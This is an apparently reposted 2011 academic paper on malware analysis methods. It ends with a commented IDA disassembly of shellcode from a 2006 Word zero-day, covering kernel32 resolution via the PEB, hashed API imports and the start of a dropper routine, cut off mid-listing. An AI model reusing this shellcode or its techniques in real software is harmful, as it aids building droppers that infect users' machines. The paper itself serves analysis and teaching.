malware analysis using assembly level program

12
Malware Analysis Using Assembly Level Program S.Murugan ACTS Team coordinator , CDAC Knowledge Park, No 1 Old Madras Road,Bangalore, Karnataka,INDIA [email protected] Dr.K.Kuppusamy, Associate professor ComputerScience and Engg Dept , AlagappaUniversity,Karaikudi, Tamilnadu,INDIA [email protected] Abstract-Malware are exciting types of programs to experiment with. One of the advantages of using assembly language is that you can both create and combat such programs. Generally, all EFFECTIVE Malware are written in assembly language. It would be difficult, if not impossible, to do this with other languages (except for C); although it is quite easy to write a self- reproducing program in any language. Viruses have been used to kill other viruses. One could conceive of viruses and worms that run around through a system carrying out useful tasks without direct intervention of particular users. The ability to forensically analyze malicious software is becoming an increasingly important discipline in the field of Digital Forensics. This is because malware is becoming stealthier, targeted, profit driven, managed by criminal organizations, harder to detect and much harder to analyze. Malware analysis requires a considerable skill set to look into deep malware internals when it is designed specifically to detect and hold back such attempts. A surplus of tools are available to the analyst including debuggers, disassemblers, de-compilers, memory dumpers, unpackers as well as many other tools common to the discipline of software engineering. All of these tools require niche expertise and a thorough understanding of the principles of their operation and the computers they execute on. 1. INTRODUCTION Malware, short for malicious software, is software designed to infiltrate a computer system without the owner's informed consent. The expression is a general term used by computer professionals to mean a variety of forms of hostile, intrusive, or annoying software or program code. The term computer virus" is sometimes used as a catch-all phrase to include all types of malware, including true viruses. Software is considered to be malware based on the perceived intent of the creator rather than any particular features. Malware includes computer viruses, worms, trojan horses, spyware, dishonest adware, crimeware, most rootkits, and other malicious and unwanted software. In law, malware is sometimes known as a computer contaminant, for instance in the legal codes of several U. S. states, including California and West Virginia. Malware is not the same as defective software, which is software that has a legitimate purpose but contains harmful bugs. Preliminary results from Symantec published in 2008 suggested that "the release rate of malicious code and other unwanted programs may be exceeding that of legitimate software applications." According to F-Secure, "As much malware [was] produced in 2007 as in the previous 20 years altogether." Malware's most common pathway from criminals to users is through the Internet: primarily by e-mail and the World Wide Web. The prevalence of malware as a vehicle for organized Internet crime, along with the general inability of traditional anti-malware protection platforms (products) to protect against the continuous stream of unique and newly produced malware, has seen the adoption of a new mindset S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012 ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 1 IJAEST

Upload: iserp-iserp

Post on 05-Mar-2016

222 views

Category:

Documents


0 download

DESCRIPTION

Malware are exciting types of programs to experiment with. One of the advantages of using assembly language is that you can both create and combat such programs. Generally, all EFFECTIVE Malware are written in assembly language. It would be difficult, if not impossible, to do this with other languages (except for C); although it is quite easy to write a self-reproducing program in any language. Viruses have been used to kill other viruses.

TRANSCRIPT

Page 1: Malware Analysis Using Assembly Level Program

Malware Analysis Using Assembly Level

Program

S.Murugan

ACTS Team coordinator , CDAC Knowledge Park,

No 1 Old Madras Road,Bangalore, Karnataka,INDIA

[email protected]

Dr.K.Kuppusamy, Associate professor

ComputerScience and Engg Dept , AlagappaUniversity,Karaikudi,

Tamilnadu,INDIA [email protected]

Abstract-Malware are exciting types of programs to experiment

with. One of the advantages of using assembly language is that

you can both create and combat such programs. Generally, all

EFFECTIVE Malware are written in assembly language. It

would be difficult, if not impossible, to do this with other

languages (except for C); although it is quite easy to write a self-

reproducing program in any language. Viruses have been used

to kill other viruses. One could conceive of viruses and worms

that run around through a system carrying out useful tasks

without direct intervention of particular users. The ability to

forensically analyze malicious software is becoming an

increasingly important discipline in the field of Digital

Forensics. This is because malware is becoming stealthier,

targeted, profit driven, managed by criminal organizations,

harder to detect and much harder to analyze. Malware analysis

requires a considerable skill set to look into deep malware

internals when it is designed specifically to detect and hold back

such attempts. A surplus of tools are available to the analyst

including debuggers, disassemblers, de-compilers, memory

dumpers, unpackers as well as many other tools common to the

discipline of software engineering. All of these tools require

niche expertise and a thorough understanding of the principles

of their operation and the computers they execute on.

1. INTRODUCTION

Malware, short for malicious software, is software

designed to infiltrate a computer system without the owner's

informed consent. The expression is a general term used by

computer professionals to mean a variety of forms of hostile,

intrusive, or annoying software or program code. The term

computer virus" is sometimes used as a catch-all phrase to

include all types of malware, including true viruses.

Software is considered to be malware based on the

perceived intent of the creator rather than any particular

features. Malware includes computer viruses, worms, trojan

horses, spyware, dishonest adware, crimeware, most rootkits,

and other malicious and unwanted software. In law, malware

is sometimes known as a computer contaminant, for instance

in the legal codes of several U. S. states, including California

and West Virginia. Malware is not the same as defective

software, which is software that has a legitimate purpose but

contains harmful bugs.

Preliminary results from Symantec published in

2008 suggested that "the release rate of malicious code and

other unwanted programs may be exceeding that of

legitimate software applications." According to F-Secure,

"As much malware [was] produced in 2007 as in the previous

20 years altogether." Malware's most common pathway from

criminals to users is through the Internet: primarily by e-mail

and the World Wide Web.

The prevalence of malware as a vehicle for

organized Internet crime, along with the general inability of

traditional anti-malware protection platforms (products) to

protect against the continuous stream of unique and newly

produced malware, has seen the adoption of a new mindset

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 1

IJAEST

Page 2: Malware Analysis Using Assembly Level Program

for businesses operating on the Internet: the acknowledgment

that some sizable percentage of Internet customers will

always be infected for some reason or another, and that they

need to continue doing business with infected customers. The

result is a greater emphasis on back-office systems designed

to spot fraudulent activities associated with advanced

malware operating on customers' computers.

On March 29, 2010, Symantec Corporation named

Shaoxing, China as the world's malware capital.

Sometimes, malware is disguised as genuine

software, and may come from an official site. Therefore,

some security programs, such as McAfee may call malware

"potentially unwanted programs" or "PUP".

Many early infectious programs, including the first

Internet Worm and a number of MS-DOS viruses, were

written as experiments or pranks. They were generally

intended to be harmless or merely annoying, rather than to

cause serious damage to computer systems. In some cases,

the perpetrator did not realize how much harm their creations

would do.

Young programmers learning about viruses and

their techniques wrote them for the sole purpose that they

could or to see how far it could spread. As late as 1999,

widespread viruses such as the Melissa virus appear to have

been written chiefly as pranks.

Hostile intent related to vandalism can be found in

programs designed to cause harm or data loss. Many DOS

viruses, and the Windows ExploreZip worm, were designed

to destroy files on a hard disk, or to corrupt the file system by

writing invalid data to them. Network-borne worms such as

the 2001 Code Red worm or the Ramen worm fall into the

same category. Designed to vandalize web pages, worms

may seem like the online equivalent to graffiti tagging, with

the author's alias or affinity group appearing everywhere the

worm goes.

Another strictly for-profit category of malware has

emerged in spyware -- programs designed to monitor user’s

web browsing, display unsolicited advertisements, or redirect

affiliate marketing revenues to the spyware creator. Spyware

programs do not spread like viruses; they are, in general,

installed by exploiting security holes or are packaged with

user-installed software, such as peer-to-peer applications.

The best-known types of malware, viruses and

worms, are known for the manner in which they spread,

rather than any other particular behavior. The term computer

virus is used for a program that has infected some executable

software and that causes that when run; spread the virus to

other executables. Viruses may also contain a payload that

performs other actions, often malicious. A worm, on the

other hand, is a program that actively transmits itself over a

network to infect other computers. It too may carry a

payload. These definitions lead to the observation that a virus

requires user intervention to spread, whereas a worm spreads

itself automatically. Using this distinction, infections

transmitted by email or Microsoft Word documents, which

rely on the recipient opening a file or email to infect the

system, would be classified as viruses rather than worms.

Before Internet access became widespread, viruses

spread on personal computers by infecting the executable

boot sectors of floppy disks. By inserting a copy of it into the

machine code instructions in these executables, a virus causes

itself to be run whenever a program is run or the disk is

booted. Early computer viruses were written for the Apple II

and Macintosh, but they became more widespread with the

dominance of the IBM PC and MS-DOS system. Executable-

infecting viruses are dependent on users exchanging software

or boot-able floppies, so they spread rapidly in computer

hobbyist circles.

The first worms, network-borne infectious

programs, originated not on personal computers, but on

multitasking UNIX systems. The first well-known worm was

the Internet Worm of 1988, which infected SunOS and VAX

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 2

IJAEST

Page 3: Malware Analysis Using Assembly Level Program

BSD systems. Unlike a virus, this worm did not insert itself

into other programs. Instead, it exploited security holes

(vulnerabilities) in network server programs and started itself

running as a separate process. This same behavior is used by

today's worms as well.

With the rise of the Microsoft Windows platform in

the 1990s, and the flexible macros of its applications, it

became possible to write infectious code in the macro

language of Microsoft Word and similar programs. These

macro viruses infect documents and templates rather than

applications (executables), but rely on the fact that macros in

a Word document are a form of executable code.

Today, worms are most commonly written for the

Windows OS, although a few like Mare-D and the Lion

worm are also written for Linux and UNIX systems. Worms

today work in the same basic way as 1988's Internet Worm:

they scan the network and leverage vulnerable computers to

replicate. Because they need no human intervention, worms

can spread with incredible speed.

2. INTRODUCTION

Malware as “software whose intent is malicious, or

whose effect is malicious”. Analysis of malicious software is

essential for computer security professionals and digital

forensic analysts and is emerging as an important field of

research. Malware is often targeted at organizations and is

increasingly using anti-forensics techniques to prevent

detection and analysis. Commercial Anti-Virus (AV)

software is often limited in its ability to detect and remove

malware. It is highly unlikely to detect new malware that is

unleashed on the internet, corporate intranet or that has been

customized to target specific networks. It is also unlikely to

detect malware that has been customized to target specific

networks.

It is undeniable that there is a digital arms race

between malware developers and malware researchers. As

soon as a technique is developed by one side, the other side

implements a counter measure. Two of the major trends are

that attackers are increasingly motivated by financial gain

and that there are indications that malware development is

becoming increasingly commercialized and developed by

professionals with extensive software engineering abilities.

Another trend is that malware has an increasing variety of

techniques available to hinder the forensic analyst. This can

include detection of the tools used by the forensic analyst and

prevention of analysis via anti-debugging, anti-disassembly,

anti-emulation, anti-memory dumping, incorporation of fake

signatures and code obfuscation.

Signature based detection of malware is dependent

upon an analyst having already analyzed the malware and

extracted a signature as well as the end user having updated

their malware signature file.

Although these techniques go some way in

protecting a system they are far from infallible and only of

minor assistance to the forensic analyst, especially if the

malware is new or has been customized. The increasing

availability of high speed network Internet connections has

also enabled the rapid production and dissemination of the

malware. All of these factors are contributing to increasing

numbers of network borne malware with respect to volume,

variety and complexity. Security professionals in the field

need to know how to determine if they are the target of an

attack and how to eradicate or mitigate threats from their

systems. This process of threat reduction can be assisted if

security professionals have up to date methodologies and

skill sets at their disposal.

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 3

IJAEST

Page 4: Malware Analysis Using Assembly Level Program

3. THE PROBLEM WITH MALWARE ANALYSIS

The spectrum of malware that represents a real

threat is expansive. A non exhaustive list includes root kits,

worms, bots, trojans, logic bombs, viruses, phishing, spam,

spyware, adware, key loggers and backdoors. No computing

platform or environment is immune to these threats.

Traditionally, malware is thought of as a virus or worm that

has a single function or payload. The resulting

countermeasure for traditional malware has been the

employment of a removal tool that was initiated by signature

detection or by recognition of heuristics defined by specific

behaviors. These tended to be like the malware they were

responding to in that they were unitary or singular in purpose.

Modern network borne malware is increasingly

multi-partite in nature incorporating several infection vectors

and possible payloads in the one instance. Signature based

systems that rely on file hashing or similar functions that

uniquely identify malware based on file contents are

increasingly failing due to the mass customization allowable

with the use of frameworks .Furthermore, anti-forensic

techniques are widely deployed to obfuscate infection, hinder

detection and retard eventual removal of the malware. This

increasing complexity and entropy makes modern malware

analysis a significant undertaking that takes considerable

time, expertise and requires an extensive knowledge domain

either in an individual or in coverage provided by a team of

analysts.

Two fundamental techniques available to the analyst

are static and dynamic analysis. Static analysis does not

execute the code and the code is analyzed via disassemblies,

call graphs, searches for strings, library calls, and

reconstruction of data structures, enumerations and unions

within the code. This analysis technique is very time

consuming and easily hindered by anti-forensics in the form

of code obfuscation, packers and protectors which are

increasingly being used by malware authors.

Dynamic analysis, in contrast, does run the code and the

analyst observes its behavior and interaction with the host

and network via mechanisms such as registry, file and

network monitoring tools. This technique is generally much

easier to conduct than static analysis but is also easily

hindered by malware that can detect the use of an emulation

environment such as VMware or the use of debugging tools

such as IDA Pro. By detecting the use of these tools and

environments, the malware can change its behavior. Once

detected, the malware can decide not to run its true payload

and can run in a deceptive mode that makes it look like much

less of a threat.

It can delete itself together with any evidence, or if

it is running with the appropriate privileges, damage or

destroy the system that it is being run on or attached uses an

iterative and recursive technique that incorporates both the

static and dynamic analysis techniques to extract the full

functionality of the code in a recursive and iterative

technique that spirals into the analysis from the higher level

view to the more detailed view. This technique also

facilitates the opportunity to discover and mitigate anti

forensic techniques as the analysis process proceeds.

4. ANALYSIS PROCESS

A high level and simplistic view of the malware

analysis process is depicted in figure 1 below. It shows

malware as one of two inputs to the analysis methodology

process which produces a report as an output. The generated

results also feedback into the analysis methodology via an

assessment process which can be used to adjust the

methodology dynamically, or as a process improvement

mechanism. Legal and ethical constraints serve as a bounding

constraint to the process.

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 4

IJAEST

Page 5: Malware Analysis Using Assembly Level Program

Programming skills are vital for in depth analysis of

malware. Systems level programming, high level languages,

scripting and even assembly language programming are

important skills required to understand how malware is

implemented and how it takes advantage of vulnerabilities. It

is also an important skill set for the development of

customized tools and for scripting disassemblers and

debuggers. The poser of being able to script debuggers and

disassemblers should not be underestimated in a malware

analysis context. Many analysis tools now also allow

additional functionality to be added by allowing users to

write customized Dynamic Link Library (DLL) plugins or

scripting languages such as IDA Python which integrates

IDA Pro scripting with the Python scripting language.

Producers of malware also develop and utilize

advanced programming techniques and technologies such as

distributed computing to enable a competitive advantage over

detection software and techniques. Therefore, it is imperative

that a malware analyst also be well versed in cutting edge

technologies and techniques.

5. MALWARE ANALYSIS

An adaptive, eclectic choice of techniques is

required for analysis of malware. Various frameworks and

methodologies such as static and dynamic analysis exist for

the malware analyst to analyze malware such as

PaiMei. Static analysis is the examination of source code

logic and behaviors, whereas dynamic analysis is the

monitoring and observation of the code as it executes. Both

techniques have strengths. Obfuscation of code may render

static analysis null and void. However, dynamic execution of

that code segment may reveal the next code sections required

for further static analysis. Other common software

engineering techniques, such as profiling, tracing and

debugging are also available, applicable and have utility in

malware analysis. The diversity of malware modus operandi

requires a range of approaches and techniques to perform

successful dissection and analysis of the malware. The skills

needed to perform competent analysis are profound, highly

technical and are at the cutting edge of computer science.

A surplus of tools are available to the analyst

including debuggers, disassemblers, de-compilers, memory

dumpers, unpackers as well as many other tools common to

the discipline of software engineering. All of these tools

require niche expertise and a thorough understanding of the

principles of their operation and the computers they execute

on. However, whether or not the tools are forensically sound

and their use acceptable in a court of law is a matter that

needs to be seriously considered.

Some useful tools are available from hacking and

software cracking sites that would not be considered

forensically sound without considerable validation or black

box testing. Such tools could contain trojans and could easily

hide a malicious purpose. They may not be forensically

acceptable without significant due diligence on the part of the

person or organizations using these types of tools. Other

software cracking or reverse engineering sites have scripts

for debuggers that can be easily and readily examined. These

scripts are useful to extract the known algorithm for dealing

with particular packers or to mitigate particular anti-forensic

techniques used by creators of such software.

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 5

IJAEST

Page 6: Malware Analysis Using Assembly Level Program

Analysis of malware will typically require

configuring a complete virtual environment suitable for it to

run in, not only from an operating systems perspective, but

also the inclusion of network infrastructure and services.

Modern malware are increasingly network borne and network

enabled. So it may be necessary to provide an environment in

which the malware can utilize commonly used services such

as Domain Name System (DNS) server, Simple Mail

Transfer Protocol (SMTP) server or an Internet Relay Chat

(IRC) server. Establishment of this style of environment

allows for the malware initiating communications with these

services to allow the dynamic capture of target data to assist

in the dynamic analysis of malware.

This type of environment may be supported by a

virtualized environment using commercial virtualization

environments such as VMWare or Virtual PC.

It should be noted that because malware can contain

the ability to detect these virtualized environments as a result

of their hardware and software fingerprints, the ability to

configure real systems and devices may need serious

consideration. This will require the configuration of a

particular computing host environment, or network device or

other system administrative tasks in order to achieve this.

This type of environment would need strict control and

isolation to prevent the spread of malware.

6. CODE

seg000:00000000 ;

seg000:00000000 ; +------------------------------------------------------------------

-------+

seg000:00000000 ; ¦ This file is generated by The Interactive

Disassembler (IDA) ¦

seg000:00000000 ; ¦ Copyright (c) 2006 by DataRescue sa/nv,

<[email protected]> ¦

seg000:00000000 ; +------------------------------------------------------------------

-------+

seg000:00000000 ;

seg000:00000000 ; File Name : C:\Documents and

Settings\Administrator\Desktop\PLANNING REPORT 5-16-2006.doc

seg000:00000000 ; Format : Binary file

seg000:00000000 ; Base Address: 0000h Range: 0000h - 246F5h Loaded

length: 246F5h

seg000:00000000 ;

seg000:00000000 ; Authors: Michael Ligh and Ryan Smith

seg000:00000000 ;

seg000:00000000 ; This is a commented dissassembly of the Word 0-day

released in

seg000:00000000 ; mid-late May 2006. This document does not describe the

vulnerability

seg000:00000000 ; or malware that results from an infection.

seg000:00000000 ;

seg000:00000000

seg000:00000000

seg000:00000000 unicode macro page,string,zero

seg000:00000000 irpc c,<string>

seg000:00000000 db '&c', page

seg000:00000000 endm

seg000:00000000 ifnb <zero>

seg000:00000000 dw zero

seg000:00000000 endif

seg000:00000000 endm

seg000:00000000

seg000:00000000 .686p

seg000:00000000 .mmx

seg000:00000000 .model flat

seg000:00000000

seg000:00000000 ----------------------------------------------------------------------

-----

seg000:00000B2E

seg000:00000B2E ; The shellcode starts here. It uses Dino Dai

Zovi's PEB resolution method

seg000:00000B2E ; to load the base address of kernel32.dll. This

information will be

seg000:00000B2E ; used to locate the addresses of kernel32's

exports (because they

seg000:00000B2E ; are offsets from the base address).

seg000:00000B2E

seg000:00000B2E nop

seg000:00000B2F nop

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 6

IJAEST

Page 7: Malware Analysis Using Assembly Level Program

seg000:00000B30 mov eax, fs:off_30 ; load PEB address into

eax

seg000:00000B36 mov eax, [eax+0Ch]

seg000:00000B39 mov esi, [eax+1Ch]

seg000:00000B3C lodsd

seg000:00000B3D mov esi, [eax+8] ; kernel32.dll entry point

seg000:00000B40 jmp loc_DAF

seg000:00000B40

seg000:00000B40 ; At this point, the code jumps to loc_DAF,

which immediately calls sub_B45.

seg000:00000B40 ; In doing so, the call instruction sets EIP to

0x00000DB4 (offset in

seg000:00000B40 ; this file) and pushes it on the stack. Notably,

the first

seg000:00000B40 ; instruction in sub_B45 is to pop this address

into eax (see below)

seg000:00000B40

seg000:00000B45

seg000:00000B45 ; ¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦ S U B R O U T I N E

¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦¦

seg000:00000B45

seg000:00000B45

seg000:00000B45 ; The first part of this code loads the address to

which EIP points

seg000:00000B45 ; into the eax register. If you look at

0x00000DB4, there isn't much,

seg000:00000B45 ; but a dword (0A2000h) and three unicode

strings of file names.

seg000:00000B45 ; The code uses the offset of these values from

EIP to reference them and

seg000:00000B45 ; builds a structure with pointers to them. The

same structure will be used

seg000:00000B45 ; to store addresses of all the kernel32 exports

later. In the code

seg000:00000B45 ; below, edi contains a pointer to the first

member of the structure.

seg000:00000B45

seg000:00000B45 sub_B45 proc near ; CODE XREF:

seg000:loc_DAFp

seg000:00000B45 pop eax

seg000:00000B46 sub esp, 200h

seg000:00000B4C mov edi, esp

seg000:00000B4E mov ebx, [eax] ; [eax] == 0A2000h

seg000:00000B50 mov [edi+4], ebx

seg000:00000B53 mov [edi+SCRATCH.hKernel32], esi ; entry

point of kernel32

seg000:00000B56 add eax, 4

seg000:00000B59 mov [edi+SCRATCH.String1], eax ; c:\~$

seg000:00000B5C add eax, 0Ch

seg000:00000B5F mov [edi+SCRATCH.String2], eax ; c:\~.exe

seg000:00000B62 add eax, 12h

seg000:00000B65 mov [edi+SCRATCH.String3], eax ; c:\~.exe

seg000:00000B6B push edi ; saves the scratch pad for

use within loc_BA1

seg000:00000B6C mov edi, esp

seg000:00000B6E xor edi, 0FFFFh

seg000:00000B74 dec edi

seg000:00000B75 dec edi

seg000:00000B76 dec edi

seg000:00000B77

seg000:00000B77 ; The next instructions search memory for the

original Word document's

seg000:00000B77 ; own filename. The last mov (above) places the

esp pointer into edi.

seg000:00000B77 ; The loop works by reading a dword from edi

and comparing it to the

seg000:00000B77 ; unicode equivalent of "oc". If it matches then

it begins to search

seg000:00000B77 ; for ".d" (which completes the ".doc"

extension). Otherwise,

seg000:00000B77 ; it decrements edi and grabs another dword.

When done, it jumps

seg000:00000B77 ; to loc_BA1.

seg000:00000B77

seg000:00000B77 loc_B77: ; CODE XREF:

sub_B45+39j

seg000:00000B77 ; sub_B45+45j ...

seg000:00000B77 dec edi

seg000:00000B78 cmp dword ptr [edi], 63006Fh ; "oc"

seg000:00000B7E jnz short loc_B77

seg000:00000B80 dec edi

seg000:00000B81 dec edi

seg000:00000B82 dec edi

seg000:00000B83 dec edi

seg000:00000B84 cmp dword ptr [edi], 64002Eh ; ".d"

seg000:00000B8A jnz short loc_B77

seg000:00000B8C push 0C8h

seg000:00000B91 pop ecx

seg000:00000B92 mov esi, edi

seg000:00000B94

seg000:00000B94 loc_B94: ; CODE XREF:

sub_B45+58j

seg000:00000B94 dec esi

seg000:00000B95 cmp dword ptr [esi], 5C003Ah

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 7

IJAEST

Page 8: Malware Analysis Using Assembly Level Program

seg000:00000B9B jz short loc_BA1 ; finished - jump to

loc_BA1

seg000:00000B9D loop loc_B94

seg000:00000B9F jmp short loc_B77 ; failed - start over again

from loc_B77

seg000:00000BA1 ; --------------------------------------------------------------------

-------

seg000:00000BA1

seg000:00000BA1 ; This is the section that fills the shellcode's

own structure

seg000:00000BA1 ; members with pointers to kernel32 exports.

Once again, edi contains

seg000:00000BA1 ; the pointer to the structure's first member, so

all [edi+xyz] are

seg000:00000BA1 ; references to the additional members. The

loop here consists of

seg000:00000BA1 ; pushing two parameters on the stack - a

dword hash of the function name

seg000:00000BA1 ; (probably hashed to obfuscate the functions it

imports) and the

seg000:00000BA1 ; entry point for kernel32.dll. Each iteration

calls resolve_func

seg000:00000BA1 ; for the actual work (see 0x00000D5B of this

file). When complete,

seg000:00000BA1 ; the code knows exactly where to find all the

system resources and

seg000:00000BA1 ; functions it needs.

seg000:00000BA1 ;

seg000:00000BA1 ; Note the xyz field in all the [edi+xyz]

operands are natively

seg000:00000BA1 ; numerical. My co-worker Ryan reversed the

resolve_func sub routine

seg000:00000BA1 ; and renamed them for readability.

seg000:00000BA1

seg000:00000BA1

seg000:00000BA1 loc_BA1: ; CODE XREF:

sub_B45+56j

seg000:00000BA1 dec esi

seg000:00000BA2 dec esi

seg000:00000BA3 pop edi

seg000:00000BA4 mov [edi+SCRATCH.szDOCFILENAME],

esi

seg000:00000BA7 push [edi+SCRATCH.hKernel32]

seg000:00000BAA push 0C0397ECh ; GlobalAlloc

seg000:00000BAF call resolve_func

seg000:00000BB4 mov [edi+SCRATCH.pGlobalAlloc], eax

seg000:00000BB7 push [edi+SCRATCH.hKernel32]

seg000:00000BBA push 7CB922F6h ; GlobalFree

seg000:00000BBF call resolve_func

seg000:00000BC4 mov [edi+SCRATCH.pGlobalFree], eax

seg000:00000BC7 push dword ptr [edi+8]

seg000:00000BCA push 7C0017BBh ; CreateFileW

seg000:00000BCF call resolve_func

seg000:00000BD4 mov [edi+SCRATCH.pCreateFileW], eax

seg000:00000BD7 push dword ptr [edi+8]

seg000:00000BDA push 0FFD97FBh ; CloseHandle

seg000:00000BDF call resolve_func

seg000:00000BE4 mov [edi+SCRATCH.pCloseHandle], eax

seg000:00000BE7 push dword ptr [edi+8]

seg000:00000BEA push 10FA6516h ; ReadFile

seg000:00000BEF call resolve_func

seg000:00000BF4 mov [edi+SCRATCH.pReadFile], eax

seg000:00000BF7 push dword ptr [edi+8]

seg000:00000BFA push 0E80A791Fh ; WriteFile

seg000:00000BFF call resolve_func

seg000:00000C04 mov [edi+SCRATCH.pWriteFile], eax

seg000:00000C07 push dword ptr [edi+8]

seg000:00000C0A push 0C2FFB03Bh ; DeleteFileW

seg000:00000C0F call resolve_func

seg000:00000C14 mov [edi+SCRATCH.pDeleteFileW], eax

seg000:00000C17 push dword ptr [edi+8]

seg000:00000C1A push 76DA08ACh ; SetFilePointer

seg000:00000C1F call resolve_func

seg000:00000C24 mov [edi+SCRATCH.pSetFilePointer], eax

seg000:00000C27 push dword ptr [edi+8]

seg000:00000C2A push 0E8AFE98h ; WinExec

seg000:00000C2F call resolve_func

seg000:00000C34 mov [edi+SCRATCH.pWinExec], eax

seg000:00000C37 push dword ptr [edi+8]

seg000:00000C3A push 99EC8974h ; CopyFileW

seg000:00000C3F call resolve_func

seg000:00000C44 mov [edi+SCRATCH.pCopyFileW], eax

seg000:00000C47 push dword ptr [edi+8]

seg000:00000C4A push 73E2D87Eh ; ExitProcess

seg000:00000C4F call resolve_func

seg000:00000C54 mov [edi+SCRATCH.pExitProcess], eax

seg000:00000C54

seg000:00000C54 ; Delete any previously existing files of the

same name. Recall these are

seg000:00000C54 ; two of the three unicode file names discussed

earlier.

seg000:00000C54

seg000:00000C57 push [edi+SCRATCH.String2] ; c:\~.exe

S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES Vol No. 2, Issue No. 1, 001 - 012

ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 8

IJAEST

Page 9: Malware Analysis Using Assembly Level Program

seg000:00000C5A call [edi+SCRATCH.pDeleteFileW]

seg000:00000C5D push [edi+SCRATCH.String1] ; c:\~$

seg000:00000C60 call [edi+SCRATCH.pDeleteFileW]

seg000:00000C63

seg000:00000C63 ; The next 3 push instructions are preparing the

arguments for CopyFile.

seg000:00000C63 ; Top down, they are 0 (for overwriting

permission), destination

seg000:00000C63 ; file name, and source file name (derived by

the code's memory searching

seg000:00000C63 ; technique).

seg000:00000C63

seg000:00000C63 push 0

seg000:00000C65 push [edi+SCRATCH.String1] ; c:\~$

seg000:00000C68 push [edi+SCRATCH.szDOCFILENAME]

seg000:00000C6B call [edi+SCRATCH.pCopyFileW]

seg000:00000C6E

seg000:00000C6E ; The next 7 push instructions are preparing the

arguments for CreateFile.

seg000:00000C6E ; Despite the function name, this only opens an

already existing file (in

seg000:00000C6E ; particular an exact copy of the original Word

document now at c:\~$ after

seg000:00000C6E ; CopyFile).

seg000:00000C6E

seg000:00000C6E push 0

seg000:00000C70 push 80h

seg000:00000C75 push 3

seg000:00000C77 push 0

seg000:00000C79 push 0

seg000:00000C7B push 80000000h

seg000:00000C80 push [edi+SCRATCH.String1] ; c:\~$

seg000:00000C83 call [edi+SCRATCH.pCreateFileW]

seg000:00000C86

seg000:00000C86 ; This is where it gets a little interesting. The

code places its read

seg000:00000C86 ; pointer at EOF and moves -4 bytes (back

toward the beginning). This

seg000:00000C86 ; is the offset to where the output file begins. It

reads data into

seg000:00000C86 ; a buffer, makes a call to allocate storate on

the heap, then resets the

seg000:00000C86 ; read pointer and does a second iteration with

different offsets. Once it

seg000:00000C86 ; has collected all the data, it proceeds to

loc_CEA for processing.

seg000:00000C86

seg000:00000C86 mov [edi+SCRATCH.hInputFile], eax

seg000:00000C89 push FILE_END

seg000:00000C8B push 0

seg000:00000C8D push -4

seg000:00000C8F push [edi+SCRATCH.hInputFile]

seg000:00000C92 call [edi+SCRATCH.pSetFilePointer]

seg000:00000C95 push 0

seg000:00000C97 lea ebx, [edi+SCRATCH.endMarker]

seg000:00000C9D push ebx

seg000:00000C9E push 4

seg000:00000CA0 lea ebx, [edi+SCRATCH.field_4]

seg000:00000CA3 push ebx

seg000:00000CA4 push [edi+SCRATCH.hInputFile] ; handle to

c:\~$

seg000:00000CA7 call [edi+SCRATCH.pReadFile]

seg000:00000CAA push [edi+SCRATCH.field_4]

seg000:00000CAD push 40h ; '@' ; allocate 40 bytes on

heap

seg000:00000CAF call [edi+SCRATCH.pGlobalAlloc]

seg000:00000CB2 mov [edi+SCRATCH.pMallocdBuff0], eax

seg000:00000CB5 mov ebx, [edi+SCRATCH.field_4]

seg000:00000CB8 add ebx, 4

seg000:00000CBB not ebx

seg000:00000CBD inc ebx

seg000:00000CBE push 2 ; new offsets and starting loc

seg000:00000CC0 push 0

seg000:00000CC2 push ebx

seg000:00000CC3 push [edi+SCRATCH.hInputFile]

seg000:00000CC6 call [edi+SCRATCH.pSetFilePointer]

seg000:00000CC9 push 0

seg000:00000CCB lea ebx, [edi+SCRATCH.endMarker]

seg000:00000CD1 push ebx

seg000:00000CD2 push [edi+SCRATCH.field_4]

seg000:00000CD5 push [edi+SCRATCH.pMallocdBuff0]

seg000:00000CD8 push [edi+SCRATCH.hInputFile]

seg000:00000CDB call [edi+SCRATCH.pReadFile]

seg000:00000CDE push [edi+SCRATCH.hInputFile]

seg000:00000CE1 call [edi+SCRATCH.pCloseHandle]

seg000:00000CE4 mov eax, [edi+SCRATCH.field_4]

